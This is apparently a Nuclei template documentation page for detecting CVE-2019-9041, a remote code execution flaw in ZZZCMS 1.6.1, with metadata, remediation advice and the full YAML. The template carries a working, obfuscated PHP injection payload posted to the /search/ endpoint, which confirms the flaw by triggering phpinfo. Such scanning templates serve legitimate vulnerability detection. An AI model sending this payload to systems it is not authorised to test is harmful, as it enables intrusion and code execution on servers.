Skip to content
Nuclei Templates

ZZZCMS 1.6.1 - Remote Code Execution

ID: CVE-2019-9041

Severity: high

Author: pikpikcu

Tags: cve,cve2019,zzzcms,rce,edb

Description

Section titled “Description”

ZZZCMS zzzphp V1.6.1 is vulnerable to remote code execution via the inc/zzz_template.php file because the parserIfLabel() function’s filtering is not strict, resulting in PHP code execution as demonstrated by the if:assert substring.

YAML Source

Section titled “YAML Source”
id: CVE-2019-9041


info:
  name: ZZZCMS 1.6.1 - Remote Code Execution
  author: pikpikcu
  severity: high
  description: ZZZCMS zzzphp V1.6.1 is vulnerable to remote code execution via the inc/zzz_template.php file because the parserIfLabel() function's filtering is not strict, resulting in PHP code execution as demonstrated by the if:assert substring.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patch or upgrade to a newer version of ZZZCMS.
  reference:
    - https://www.exploit-db.com/exploits/46454/
    - http://www.iwantacve.cn/index.php/archives/118/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-9041
    - https://github.com/Elsfa7-110/kenzer-templates
    - https://github.com/sobinge/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2019-9041
    cwe-id: CWE-917
    epss-score: 0.02876
    epss-percentile: 0.9052
    cpe: cpe:2.3:a:zzzcms:zzzphp:1.6.1:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: zzzcms
    product: zzzphp
  tags: cve,cve2019,zzzcms,rce,edb


http:
  - raw:
      - |
        POST /search/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
      - |
        POST /search/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}


    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - '!contains(body_1, "phpinfo")'
          - 'contains_all(body_2, "phpinfo","PHP Version")'
        condition: and
# digest: 4a0a0047304502201d805664f680afc3f45438ab6c01ad708f2ad72c07555f46458459c2eff2cbee022100ce9d53f091b34fd15381094fd4faf5088cb1a8358f086e9a691918c91ed204f9:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-9041.yaml"

View on Github